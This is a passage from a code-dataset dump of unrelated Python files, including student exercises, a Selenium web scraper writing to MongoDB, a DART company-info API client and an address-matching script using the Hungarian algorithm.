FNnew)\nprint(\"the accuracy is\",trainaccuracynew)\nprint(\"the precision is\",trainprecisionew)\nprint(\"the sensitivity is\",trainsensitivitynew)\nprint(\"the trainspecificity is\",trainspecificitynew)\nfprnew, tprnew, thresholdsnew = sk.metrics.roc_curve(y_trainnew, scorenew)\nplt.figure()\nplt.scatter(fprnew,tprnew)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel(\"trainFPRnew\")\nplt.ylabel(\"trainTPRnew\")\nplt.show()\ny_scorenew = gnbnew.predict_proba(X_trainnew)\nprecisionnew, recallnew, thresholdnew = sk.metrics.precision_recall_curve(y_trainnew, y_scorenew[:,1])\nplt.figure()\nplt.plot(recallnew, precisionnew)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel('trainrecallnew')\nplt.ylabel('trainprecisionnew')\nplt.show()\n\n# get the accuracy of different dataset\nytrainaccuracy = get_accuracy(gnb, X_train, y_train)\nprint(\"the accuracy on the train set of the original data is\",ytrainaccuracy)\nytrainnewaccuracy = get_accuracy(gnbnew, X_trainnew, y_trainnew)\nprint(\"the accuracy on the train set of the selecting data is\",ytrainnewaccuracy)\nytestaccuracy = get_accuracy(gnb, X_test, y_test)\nprint(\"the accuracy on the test set of the original data is\",ytestaccuracy)\nytestnewaccuracy = get_accuracy(gnbnew, X_testnew, y_testnew)\nprint(\"the accuracy on the test set of the selecting data is\",ytestnewaccuracy)\n","sub_path":"assignment4.py","file_name":"assignment4.py","file_ext":"py","file_size_in_byte":10651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"165492633","text":"macos= int(input(\"Quantos cigarros por dia? \"))\n\ntempo= int(input(\"Quantos anos fuma? \"))\n\n#1 cigarro 10min de vida #1 dia= 24*60 min\n\ndef perdido (macos,tempo):\n m=macos*10*365*tempo #minutos perdidos nos anos de fumo\n dia= m/(24*60)\n return dia\n\nvida= perdido(macos,tempo)\n\nprint(\"Tempo perdido: {0} dias\".format(vida))","sub_path":"backup/user_314/ch22_2020_09_02_19_56_54_169012.py","file_name":"ch22_2020_09_02_19_56_54_169012.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"378001094","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# 종목코드를 고유변호로 변환 (함수 정의)\ndef get_code(stock_code): \n # 고유번호 리스트 파일 불러오기 \n XML_PATH = \"./data/CORPCODE.xml\"\n infile = open(XML_PATH,\"r\", encoding='utf-8')\n code_xml = infile.read()\n soup_xml = BeautifulSoup(code_xml,'html.parser')\n\n # 종목코드를 찾고, 고유번호를 추출\n items = soup_xml.find_all('list') \n for item in items:\n scode = item.find('stock_code').text\n if str(scode)==str(stock_code):\n corp_code = item.find('corp_code').text\n print('고유번호: %s' % corp_code)\n return corp_code\n \n print('Failed to get the proper code...') \n return None\n\n# Open DART 접속\nif __name__==\"__main__\":\n\n # DART 전자공시 사이트 APT 인증키 입력\n my_auth_key = \"---발급받은 개인 키를 입력하세요---\" \n \n # 기업개황 정보 접속 URL\n crp_cd = get_code(\"005380\")\n url = \"https://opendart.fss.or.kr/api/company.xml?crtfc_key=\"+my_auth_key+\"&corp_code=\"+crp_cd\n\n # BeautifulSoup으로 API가 반환하는 XML 해석하여 dataframe으로 정리\n xml = requests.get(url)\n soup = BeautifulSoup(xml.text, 'html.parser') \n\n corp_name = soup.find('corp_name').text\n corp_name_eng = soup.find('corp_name_eng').text\n stock_name = soup.find('stock_name').text\n stock_code = soup.find('stock_code').text\n ceo_nm = soup.find('ceo_nm').text\n corp_cls = soup.find('corp_cls').text\n jurir_no = soup.find('jurir_no').text\n bizr_no = soup.find('bizr_no').text\n adres = soup.find('adres').text\n hm_url = soup.find('hm_url').text\n ir_url = soup.find('ir_url').text\n phn_no = soup.find('phn_no').text\n fax_no = soup.find('fax_no').text\n induty_code = soup.find('induty_code').text\n est_dt = soup.find('est_dt').text\n acc_mt = soup.find('acc_mt').text\n \n company_info = {'corp_name':corp_name,\n 'corp_name_eng':corp_name_eng,\n 'stock_name':stock_name,\n 'stock_code':stock_code,\n 'ceo_nm':ceo_nm,\n 'corp_cls':corp_cls,\n 'jurir_no':jurir_no,\n 'bizr_no':bizr_no,\n 'adres':adres,\n 'hm_url':hm_url,\n 'ir_url':ir_url,\n 'phn_no':phn_no,\n 'fax_no':fax_no,\n 'induty_code':induty_code,\n 'est_dt':est_dt,\n 'acc_mt':acc_mt, \n }\n\nprint(company_info)","sub_path":"5674-849/044.py","file_name":"044.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"94525764","text":"import time\nimport requests\nimport json\nimport os\nimport logging\n\nfrom xpmsrequests.data import DataVariables\nfrom xpmsrequests.rangerrequests import requestsrangerbase\n\nclass RangerReq(requestsrangerbase.RangerBase):\n TempDocID = ''\n def __init__(self):\n # Create the Logger\n super(RangerReq,self).__init__()\n self.logger = logging.getLogger(__name__)\n # *****************************************************************************************************\n # *****************************************************************************************************\n\n def getDataByJobId(self,JobId):\n self.logger.info('Into getDataByJobId method')\n jobIdUrl = DataVariables.RangerJobIdUrl+JobId\n self.logger.info('JobIdUrl is :'+jobIdUrl)\n status = 'in-progress'\n processStatus = 'process_status'\n\n try:\n count = 1\n while (count <= DataVariables.TimeOut):\n tempJson = requests.get(jobIdUrl).json()\n if(count > DataVariables.TimeOut):\n self.logger.error('Time Count Exceeded')\n return None\n if (tempJson[processStatus] != status):\n print('Exited while')\n self.logger.info('Returning Json :'+str(tempJson))\n return tempJson\n if (tempJson[processStatus] == status):\n self.logger.info('Into Sleep')\n self.logger.info('Sleep Time is : '+str(DataVariables.PollTime))\n time.sleep(DataVariables.PollTime)\n count += 1\n self.logger.info('count is :'+str(count))\n except:\n print('Unable to generate response')\n self.logger.error('Unable to generate response')\n\n\n # *****************************************************************************************************\n # *****************************************************************************************************\n\n def upLoadReq(self, imgUrl):\n\n self.logger.info('Into upLoadReq method')\n files = {'file': open(imgUrl, 'rb')}\n # self.logger.info('file is:'+str(files))\n response = requests.post(DataVariables.RangerUploadURL, files=files)\n self.logger.info('Response Json after uploading image is' + str(response.json()))\n if (response.status_code == 200):\n self.logger.info(\n 'Status of Response returned after uploading the image is ' + str(response.status_code))\n return response.json()\n else:\n self.logger.error(\n 'Status of Response returned after uploading the image is' + str(response.status_code))\n return None\n\n # *****************************************************************************************************\n\n def insightIngest(self, uploadjson):\n self.logger.info('Into Insight Ingest method')\n jsonFileData = self.getJsonFileData(DataVariables.Insightingestjson)\n self.logger.info('The body Of insight Ingest Json Is :' + str(jsonFileData))\n jsonFileData['data']['file_path'][0] = uploadjson['metadata']['file_path']\n jsonFileData['data']['request_type'] = 'ingest_document'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight Ingest json after assigning metadata of Upload json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n ingestFileJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by insightIngest is :' + str(ingestFileJobID))\n return ingestFileJobID\n\n # *****************************************************************************************************\n\n def insightExtractDocumentMetadata(self,injestInsightJson):\n self.logger.info('Into insightExtractDocumentMetadata method')\n jsonFileData = 
self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of Getinsight Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n jsonFileData['data']['doc_id'] = injestInsightJson['result']['metadata']['insights'][0]['insight']['doc_id']\n RangerReq.TempDocID = jsonFileData['data']['doc_id']\n print('$$$$$$$$$$$$$$The Doc Id Is $$$$$$$$$$$$$$$$$$',jsonFileData['data']['doc_id'])\n self.logger.info('$$$$$$$$$$$$$$The Doc Id Is $$$$$$$$$$$$$$$$$$'+ str(jsonFileData['data']['doc_id']))\n jsonFileData['data']['request_type'] = 'extract_document_metadata'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of InsightIngest json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightExtractDocumentMetadataJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by insightExtractDocumentMetadata is :' + str(insightExtractDocumentMetadataJobID))\n return insightExtractDocumentMetadataJobID\n\n # *****************************************************************************************************\n\n def insightConvertDocument(self,insightExtractDocumentMetadataJson):\n self.logger.info('Into insightConvertDocument method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n jsonFileData['data']['doc_id'] = insightExtractDocumentMetadataJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'convert_document'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ExtractDocumentMetadata json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightConvertDocumentJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ConvertDocumentJobID is :' + str(insightConvertDocumentJobID))\n return insightConvertDocumentJobID\n\n # *****************************************************************************************************\n\n def insightClassifyDocument(self,insightConvertDocumentJson):\n self.logger.info('Into insightClassifyDocument method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n #jsonFileData['data']['doc_id'] = insightConvertDocumentJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'classify_document'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ConvertDocument json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightClassifyDocumentJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ClassifyDocumentJobID is :' + str(insightClassifyDocumentJobID))\n return insightClassifyDocumentJobID\n\n # 
*****************************************************************************************************\n\n def insightExtractDocumentElements(self,insightClassifyDocumentJson):\n self.logger.info('Into insightExtractDocumentElements method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n #jsonFileData['data']['doc_id'] = insightClassifyDocumentJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'extract_document_elements'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ClassifyDocument json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightExtractDocumentElementsJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ExtractDocumentElementsJobID is :' + str(insightExtractDocumentElementsJobID))\n return insightExtractDocumentElementsJobID\n\n # *****************************************************************************************************\n def insightExtractDocumentText(self,insightExtractDocumentElementsJson):\n self.logger.info('Into insightExtractDocumentText method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n #jsonFileData['data']['doc_id'] = insightExtractDocumentElementsJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'extract_document_text'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ExtractDocumentElements json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightExtractDocumentTextJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ExtractDocumentElementsJobID is :' + str(insightExtractDocumentTextJobID))\n return insightExtractDocumentTextJobID\n\n","sub_path":"xpmsrequests/rangerrequests/requestsranger.py","file_name":"requestsranger.py","file_ext":"py","file_size_in_byte":10447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"396585292","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/webmpris/urls.py\n# Compiled at: 2013-11-14 22:46:20\nfrom django.conf.urls import patterns, url\nfrom webmpris.views import Root, Player, TrackList, Playlists\nOBJ_MAP = {'Root': Root, 'Player': Player, \n 'TrackList': TrackList, \n 'Playlists': Playlists}\nurlpatterns = patterns('webmpris.views', url('^players$', 'get_players', name='players'))\nfor name, obj in OBJ_MAP.items():\n url_prop = ('^players/(?P:[\\\\w.]+)/{name}$').format(name=name)\n url_meth = url_prop[:-1] + '/(?P[\\\\w]+$)'\n urlpatterns += patterns('', url(url_prop, obj.as_view()), url(url_meth, obj.as_view()))","sub_path":"pycfiles/webmpris-1.1-py2.7/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"574126520","text":"# return a list ret that contains all prime numbers <= N\ndef sieve_algorithm(N):\n myList = [True] * (N+1);\n\n for i in range(2,N+1):\n if myList[i]==True:\n j=2;\n while j*i<=N:\n myList[j*i] = False\n j+=1\n\n ret = []\n for i in range(2,N+1):\n if(myList[i]):\n ret.append(i)\n\n return ret\n\nprint(sieve_algorithm(11))\n","sub_path":"sieve.py","file_name":"sieve.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"260000945","text":"\"\"\"\nbirthday.py\nAuthor: Esther Hacker\nCredit: N/A\nAssignment: Birthday Problem\n\nYour program will ask the user the following questions, in this order:\n\n1. Their name.\n2. The name of the month they were born in (e.g. \"September\").\n3. The year they were born in (e.g. \"1962\").\n4. The day they were born on (e.g. \"11\").\n\nIf the user's birthday fell on October 31, then respond with:\n\n You were born on Halloween!\n\nIf the user's birthday fell on today's date, then respond with:\n\n Happy birthday!\n\nOtherwise respond with a statement like this:\n\n Peter, you are a winter baby of the nineties.\n\nExample Session\n\n Hello, what is your name? Eric\n Hi Eric, what was the name of the month you were born in? September\n And what year were you born in, Eric? 1972\n And the day? 11\n Eric, you are a fall baby of the stone age.\n\"\"\"\nfrom datetime import datetime\nfrom calendar import month_name\ntodaymonth = datetime.today().month\ntodaydate = int(datetime.today().day)\ntodayyear = int(datetime.today().year)\n\ntodaymonthname = month_name[todaymonth].lower()\n\nname = input(\"Hello, what is your name? \")\nmonth = input(\"Hi \" + name + \", what is the name of the month you were born in? \")\nmonth = month.lower()\nday = int(input(\"And what day of the month were you born on, \" + name + \"? \"))\nyear = int(input(\"And the year? \"))\n\nif month == \"october\" and day == 31:\n print(\"You were born on Halloween!\")\n \nelse:\n if month == todaymonthname and day == todaydate:\n print(\"Happy birthday!\")\n\n else:\n if month == \"december\" or month == \"january\" or month == \"february\":\n season = \"winter\"\n \n if month == \"march\" or month == \"april\" or month == \"may\":\n season = \"spring\"\n \n if month == \"june\" or month == \"july\" or month == \"august\":\n season = \"summer\"\n \n if month == \"september\" or month == \"october\" or month == \"november\":\n season = \"fall\"\n \n if year in range(1980, 1990):\n decade = \"eighties\"\n \n if year in range(1990, 2000):\n decade = \"nineties\"\n \n if year in range(2000, todayyear):\n decade = \"two thousands\"\n \n if year not in range(1980, todayyear):\n decade = \"stone age\"\n \n print(name + \", you are a \" + season + \" baby of the \" + decade + \".\")\n","sub_path":"birthday.py","file_name":"birthday.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"206420513","text":"import logging\nimport time\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium import webdriver\nfrom lxml import etree\nimport pymongo\n\nclass Selenium():\n def __init__(self, timeout=None):\n self.logger = logging.getLogger(__name__)\n self.timeout = 20\n self.browser = webdriver.Chrome()\n # self.browser.set_window_size(1400, 700)\n self.browser.set_page_load_timeout(self.timeout)\n self.wait = WebDriverWait(self.browser, self.timeout)\n self.client = pymongo.MongoClient('localhost')\n self.db = self.client['new_hc']\n\n def __del__(self):\n self.browser.close()\n\n def process(self,url,tag):\n self.logger.debug('Chrome is Starting')\n try:\n self.browser.get(url)\n time.sleep(0.5)\n # ActionChains(self.browser).send_keys(Keys.DOWN).perform()\n try:\n js = \"var q=document.documentElement.scrollTop=500\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=1200\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=1800\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=2500\"\n self.browser.execute_script(js)\n time.sleep(1)\n js = \"var q=document.documentElement.scrollTop=3200\"\n self.browser.execute_script(js)\n time.sleep(1)\n js = \"var q=document.documentElement.scrollTop=3700\"\n self.browser.execute_script(js)\n time.sleep(1)\n except:\n js = \"var q=document.documentElement.scrollTop=500\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=1000\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=1500\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=2300\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=3500\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=4000\"\n self.browser.execute_script(js)\n self.parse_detail(self.browser.page_source,tag)\n except TimeoutException:\n ActionChains(self.browser).send_keys(Keys.F5).perform()\n time.sleep(1)\n return self.process(url,tag)\n return self.browser\n\n def parse_detail(self, response,tag):\n # print(response.url)\n # item = response.meta['item']\n doc = etree.HTML(response)\n urls = doc.xpath(\"//div[@class='picmid pRel']\")\n print(len(urls))\n for url in urls:\n sub_url = url.xpath(\"./a/@href\")[0]\n # print(sub_url)\n if 'http' in sub_url:\n continue\n sub_url = 'https:' + sub_url\n item = {'link':sub_url,'tag': tag}\n if self.db['link'].update({'link':sub_url},{'$set': item},True):\n print('成功保存到mongo',tag,sub_url)\n else:\n print('No Mongo')\n # # yield item\n # yield scrapy.Request(sub_url, callback=self.parse_sh, dont_filter=True)\n page = doc.xpath(\"//span[@class='page_next page-n']/a[@title='下一页']/@href\")\n if page:\n next_page = 'https:' + page[0]\n print('当前页', next_page, '-------------')\n return self.process(next_page,tag)\n # yield scrapy.Request(next_page,callback=self.parse_detail,dont_filter=True)\n else:\n print(\"页面枯竭\")\n pass\n\n def run(self):\n # print(self.db.get_collection('hc').find({}).count())\n for url in self.db.get_collection('link').find({}):\n print(url)\n 
self.process(url['big_link'],url['tag'])\n # self.parse_detail(html)\n\nif __name__ == '__main__':\n hc = Selenium()\n hc.run()\n\n\n\n# import requests\n# import pymongo\n# from lxml import etree\n# client = pymongo.MongoClient('localhost')\n# db = client['new_hc']\n# headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'}\n# response = requests.get(\"http://www.js.hc360.com/\",headers=headers)\n\n","sub_path":"hc_selenium.py","file_name":"hc_selenium.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"299544200","text":"#!/usr/bin/env python3\n#author:Alnk(李成果)\nimport os\nfrom course_system.core.Basic import Basic\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n\nclass School(Basic):\n '''学校类'''\n def __init__(self):\n pass\n def create_school(self,school_name,school_addr):\n '''创建学校'''\n if os.path.isfile(BASE_DIR + \"/course_system/db/school.json\"):\n school_dict = Basic.read(self,'school.json')\n else:\n school_dict = {}\n school_dict[school_name] = {'addr':school_addr}\n w = Basic()\n w.write(school_dict,'school.json')\n print('学校[%s] 地址[%s] 创建成功!' % (school_name, school_addr))\n def create_course(self,school_name,course_name,course_tuition):\n '''创建课程'''\n if os.path.isfile(BASE_DIR + \"/course_system/db/course.json\"):\n course_dict = Basic.read(self,'course.json')\n else:\n course_dict ={}\n course_dict[course_name] = {'school':school_name,'stution':course_tuition}\n w = Basic()\n w.write(course_dict,'course.json')\n print('[%s]学校的[%s]课程创立成功!' %(school_name,course_name))\n def create_teacher(self,teacher_name,teacher_salary,school_name):\n '''创建老师'''\n if os.path.isfile(BASE_DIR + \"/course_system/db/teacher.json\"):\n teacher_dict = Basic.read(self,'teacher.json')\n else:\n teacher_dict = {}\n teacher_dict[teacher_name] = {'school': school_name,'salary': teacher_salary,}\n Basic.write(self, teacher_dict, 'teacher.json')\n print('[%s]老师雇佣成功'%teacher_name)\n def create_grade(self,school_name,grade_name,course_name,teacher_name):\n '''创建班级'''\n if os.path.isfile(BASE_DIR + \"/course_system/db/grade.json\"):\n grade_dict = Basic.read(self,'grade.json')\n else:\n grade_dict = {}\n grade_dict[grade_name] = {'school':school_name,'course':course_name,'teacher':teacher_name,'student':[]}\n w = Basic()\n w.write(grade_dict,'grade.json')\n print('[%s]班级创建成功'%grade_name)","sub_path":"day06/02作业/course_system/core/School.py","file_name":"School.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"312870773","text":"#!coding=utf8\nimport xlrd\nfrom scipy.optimize import linear_sum_assignment\nimport numpy as np\nimport pandas as pd\nimport pdb\nimport sys\n#import xlrd\n#import jsonload\n#from jsonload import get_kv,loadFont,cal_dis\nfrom function_ultra import utils\nfrom function_ultra.mylog import logger\nimport time\nimport codecs\n\nlogger.debug(\"> start mark\")\nlabelmap = {}\nlabelmap[\"B\"] = 0\nlabelmap[\"I\"] = 1\nlabelmap[\"O\"] = 2\nlabelmap[\"S\"] = 3\n\ndef cost_matrix_value(cost):\n row_ind,col_ind=linear_sum_assignment(cost)\n #print(row_ind)#开销矩阵对应的行索引\n #print(col_ind)#对应行索引的最优指派的列索引\n #print(cost[row_ind,col_ind])#提取每个行索引的最优指派列索引所在的元素,形成数组\n #print(cost[row_ind,col_ind].sum())#数组求和\n return cost[row_ind,col_ind].sum(),row_ind,col_ind\n#for i,j in zip(row_ind, col_ind):\n# print(cost[i,j])\n\n\ndef matrix_build_extract(contl,contr,dct=None,weight=0):\n #ichar_num = [\"一\",\"二\",\"三\",\"四\",\"五\",\"六\",\"七\",\"八\",\"九\",\"零\"]\n #ichar_num.extend([\"栋\",\"单元\",\"层\",\"号\",\"室\",\"户\"])\n ichar_num = [\" \"]\n #pdb.set_trace()\n mat = np.array([1]*len(contl)*len(contr)).reshape(len(contl),len(contr))\n #mulby= (len(contl)-len(contr))**2\n #mulby+=2\n mulby=1\n for i in range(len(contl)):\n ll=1+len(contl)-i\n for j in range(len(contr)):\n lr=1+len(contr)-j\n #if not dct.get('%s_%s'%(contl[i],contr[j]),-1) == -1:\n # mat[i][j]=0\n #if contl[i] in ichar_num or contr[j] in ichar_num:\n # mulby=0\n # mulby=0\n #if False:\n # pass\n #pdb.set_trace()\n #mat[i][j]=(1/len(contl))\n # mat[i][j]=0\n if contl[i]==contr[j]:\n mat[i][j]=0\n else:\n if weight==1:#前面重要\n #mat[i][j]=1*mulby\n mat[i][j]=(ll+lr)*mulby\n elif weight==-1:#后重要\n mat[i][j]=(i+j)*mulby\n #mat[i][j]=(lr*ll*mulby)\n #mat[i][j]=np.log(10+(lr*ll*mulby))\n elif weight==0:\n mat[i][j]=mulby\n else:\n logger.log(\"there is sth wrong\")\n pdb.set_trace()\n assert lr>0\n assert ll>0\n return mat\n\ndef matrix_build(contl,contr,dct=None,weight=0):\n ichar_num = [\" \"]\n mat = np.array([1]*len(contl)*len(contr)).reshape(len(contl),len(contr))\n mulby=1\n for i in range(len(contl)):\n ll=1+len(contl)-i\n for j in range(len(contr)):\n lr=1+len(contr)-j\n if not dct.get('%s_%s'%(contl[i],contr[j]),-1) == -1:\n mat[i][j]=0\n else:\n if weight==1:#前面重要\n mat[i][j]=(ll+lr)*mulby\n elif weight==-1:#后重要\n mat[i][j]=(i+j)*mulby\n elif weight==0:\n mat[i][j]=mulby\n else:\n logger.log(\"there is sth wrong\")\n pdb.set_trace()\n assert lr>0\n assert ll>0\n return mat\n\ndef hugry_match(mat,k1s,k2s):\n s,r,c = cost_matrix_value(mat)\n data = []\n label = []\n match = []\n for i,j in zip(r,c):\n if k1s[i]==k2s[j]:\n match.append(j)\n else:\n pass\n for i in range(len(k2s)):\n if i in match:\n data.append(k2s[i])\n label.append(labelmap[\"I\"])\n else:\n data.append(k2s[i])\n label.append(labelmap[\"O\"])\n return data,label,s,r,c\n\ndef read_txt(filename,shuffle):\n lines = codecs.open(filename,\"r\",\"utf-8\").readlines()\n for line in lines:\n if shuffle:\n line = lines[np.random.randint(len(lines))]\n line = line.split(\"&\")[0]\n line = utils.clr(line)\n yield line\n\n'''\ndef mark_from_txt_compare(filename):\n gen = read_txt(filename)\n _gen = read_txt(filename)\n for i in gen:\n for j in _gen:\n if i == j:\n continue\n elif len(i)>len(j):\n data, label,s,r,c = hugry_match(matrix_build(i,j),i,j)\n yield (data,label)\n else:\n data, label,s,r,c = hugry_match(matrix_build(j,i),j,i)\n yield (data,label)\n'''\ndef show_match(filename):\n cnt = 100\n with open(\"match_sample.txt\",\"r\") as f:\n lines = 
f.readlines()\n for line in lines:\n kv = line.split(\"\\t\")\n pas = \"\"\n for i,j in zip(kv[0],kv[1]):\n if j == \"1\":\n pas+=i\n else:\n pas+=\"_\"\n cnt-=1\n if cnt<0:\n time.sleep(0.2)\n cnt=100\n\ndef read_xlrd(filename):\n ad = xlrd.open_workbook(filename)\n sts = ad.sheets()\n rows = sts[0].get_rows()\n result = []\n for line in rows:\n k = line[14].value\n v = line[10].value\n k = utils.clr(k)\n v = utils.clr(v)\n data,label,s,r,c= hugry_match(matrix_build(k,v),k,v)\n yield (data,label,k,v)\n\ndef addr_classifier(k,v,dct,direct):\n data,label,s,r,c= hugry_match(matrix_build(k,v,dct,direct),k,v)\n return data,label,s,r,c\n\ndef init_ner_train_data(filename):\n gen = read_txt(filename,shuffle=True)\n f = open(filename,\"a+\")\n for sent in gen:\n sent = utils.clr(sent)\n for char in sent:\n f.write(\"%s O\\n\"%char)\n f.write(\"\\n\")\n f.close()\n\ndef sent_pair_gen(filename):\n with open(filename, \"a+\") as gh:\n gen = read_xlrd(\"/home/dell/data/addr_guiyang_zhongtian_huayuan.xlsx\")\n for i in gen:\n k = i[2]\n v = i[3]\n gh.write(\"%s %s\\n\"%(k,v))\n gh.flush()\nimport re\n\ndef seperate_zhengz_address(filename):\n rt = open(\"/home/dell/data/zhengz_train.txt\",\"w+\")\n wx = open(\"/home/dell/data/zhengz_dev.txt\",\"w+\")\n tmp = []\n with open(filename) as f:\n lines = f.readlines()\n for line in lines:\n line = re.sub(\"[\\r\\n]\",\"\",line)\n line = re.sub(\"NONE\",\"\",line)\n line = re.sub(\" \",\"\",line)\n line = utils.clr(line)\n if 'ROOT' in line:\n qua,ans = line.split('ROOT')\n rt.write(\"%s %s 0\\n\"%(qua,ans))\n else:\n if len(tmp) == 2:\n rt.write(\"%s %s 1\\n\"%(tmp[0],tmp[1]))\n tmp = []\n else:\n tmp.append(line)\n rt.close()\n wx.close()\n\n\ndef zhengz_train_data_gen_sent_pairs():\n standf = '/home/dell/data/zz_std_words.txt'\n samplef = '/home/dell/data/eval_zz.txt'\n filename = \"/home/dell/data/zhengz_comp.txt\"\n stand = read_txt(standf,shuffle=True)\n sampl = read_txt(samplef,shuffle=True)\n cont = open(filename,\"w+\")\n index = 0\n for lstd in stand:\n for lsam in sampl:\n cont.write('%s %s\\n'%(lstd,lsam))\n index+=1\n if index>1000000:\n break\n stand.close()\n sampl.close()\n cont.close()\n\ndef train_data_gen_sent_pairs(filename,writeintrain,writeintest):\n with open(writeintrain,\"w+\") as g:\n with open(writeintest,\"w+\") as h:\n with open(filename,\"r\") as f:\n lines = f.readlines()\n sep = int(len(lines)*0.9//1)\n for line in lines[:sep]:\n line = re.sub(\"[\\r\\n]\",\"\",line)\n sent_a, sent_b = line.split(\" \")\n g.write(\"%s %s 0\\n\"%(sent_a,sent_b))\n cnt = np.random.randint(len(lines))\n g.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n cnt = np.random.randint(len(lines))\n g.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n cnt = np.random.randint(len(lines))\n g.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n\n for line in lines[sep:]:\n line = re.sub(\"[\\r\\n]\",\"\",line)\n sent_a, sent_b = 